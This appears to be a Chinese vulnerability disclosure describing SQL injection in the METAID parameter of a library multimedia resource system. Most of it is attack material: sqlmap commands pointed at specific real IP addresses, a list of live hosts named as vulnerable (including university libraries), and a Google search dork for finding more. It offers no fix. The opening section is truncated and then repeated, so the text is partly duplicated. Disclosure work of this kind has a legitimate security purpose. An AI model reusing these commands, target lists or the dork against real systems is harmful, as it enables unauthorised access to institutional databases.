### 简要描述: 某资料系统SQL注射漏洞 ### 详细说明: 某资料系统SQL注射漏洞 ### 漏洞证明: 博文非书资料系统都会存在一个视频存储,而这个注入在 poweb/ShowPic?METAID=18920 案例一: C:\Python27\sqlmap>sqlmap.py -u "http://219.243.15.9:8080/poweb/ShowPic?METAID=7 319" -v 1 [<img src="https://images.seebug.org/upload/201503/03211711465b8f9956e354a9bae653cd88cceb1a.jpg" alt="360截图20150303211708332.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/03211711465b8f9956e354a9bae653cd88cceb1a.jpg) 案例二: C:\Python27\sqlmap>sqlmap.py -u "http://210.44.1.2:8080/poweb/ShowPic?METAID=525 32" -v 1 [<img src="https://images.seebug.org/upload/201503/032117316ebcfad102e9945849ab54eca5a76296.jpg" alt="360截图20150303211730898.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/032117316ebcfad102e9945849ab54eca5a76296.jpg) 案例三: C:\Python27\sqlmap>sqlmap.py -u "http://202.206.242.26:88/poweb/ShowPic?METAID=5 2532" -v 1 [<img...
### 简要描述: 某资料系统SQL注射漏洞 ### 详细说明: 某资料系统SQL注射漏洞 ### 漏洞证明: 博文非书资料系统都会存在一个视频存储,而这个注入在 poweb/ShowPic?METAID=18920 案例一: C:\Python27\sqlmap>sqlmap.py -u "http://219.243.15.9:8080/poweb/ShowPic?METAID=7 319" -v 1 [<img src="https://images.seebug.org/upload/201503/03211711465b8f9956e354a9bae653cd88cceb1a.jpg" alt="360截图20150303211708332.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/03211711465b8f9956e354a9bae653cd88cceb1a.jpg) 案例二: C:\Python27\sqlmap>sqlmap.py -u "http://210.44.1.2:8080/poweb/ShowPic?METAID=525 32" -v 1 [<img src="https://images.seebug.org/upload/201503/032117316ebcfad102e9945849ab54eca5a76296.jpg" alt="360截图20150303211730898.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/032117316ebcfad102e9945849ab54eca5a76296.jpg) 案例三: C:\Python27\sqlmap>sqlmap.py -u "http://202.206.242.26:88/poweb/ShowPic?METAID=5 2532" -v 1 [<img src="https://images.seebug.org/upload/201503/032117531c14f1c764c12274d950ba3e9c6f042e.jpg" alt="360截图20150303211748238.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/032117531c14f1c764c12274d950ba3e9c6f042e.jpg) 案例四: http://121.9.253.233:8089/poweb/ShowPic?METAID=3431 [<img src="https://images.seebug.org/upload/201503/03211823ddd4d9e713a9273de369967c536e98e9.jpg" alt="360截图20150303211822665.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/03211823ddd4d9e713a9273de369967c536e98e9.jpg) 案例五: http://lib.zust.edu.cn:8080/poweb/ShowPic?METAID=18782 [<img src="https://images.seebug.org/upload/201503/032118487348c95004e5fcccb0d20f7485fa0d47.jpg" alt="360截图20150303211845294.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/032118487348c95004e5fcccb0d20f7485fa0d47.jpg) 上是个案例: http://202.113.140.10:8080/poweb/ShowPic?METAID=18920 http://222.29.253.58:8080/poweb/ShowPic?METAID=1644 http://210.44.1.2:8080/poweb/ShowPic?METAID=52532 http://202.206.242.26:88/poweb/ShowPic?METAID=52532 http://218.192.55.9/poweb/ShowPic?METAID=124010 http://210.35.35.73:8080/poweb/ShowPic?METAID=1644 http://210.37.2.192:90/poweb/ShowPic?METAID=1644 http://210.38.64.114:85/poweb/ShowPic?METAID=9964 http://lib.zust.edu.cn:8080/poweb/ShowPic?METAID=18782 http://121.9.253.233:8089/poweb/ShowPic?METAID=3431 http://202.206.242.26:88/poweb/ShowPic?METAID=13199 http://rom.hztsg.com:9091/poweb/ShowPic?METAID=1689 http://www.dqlib.com.cn:8005/poweb/ShowPic?METAID=876 谷歌很好找: inurl:/poweb/ inurl:?METAID 打开网页直接这个 METAID 替换上去=后面的数字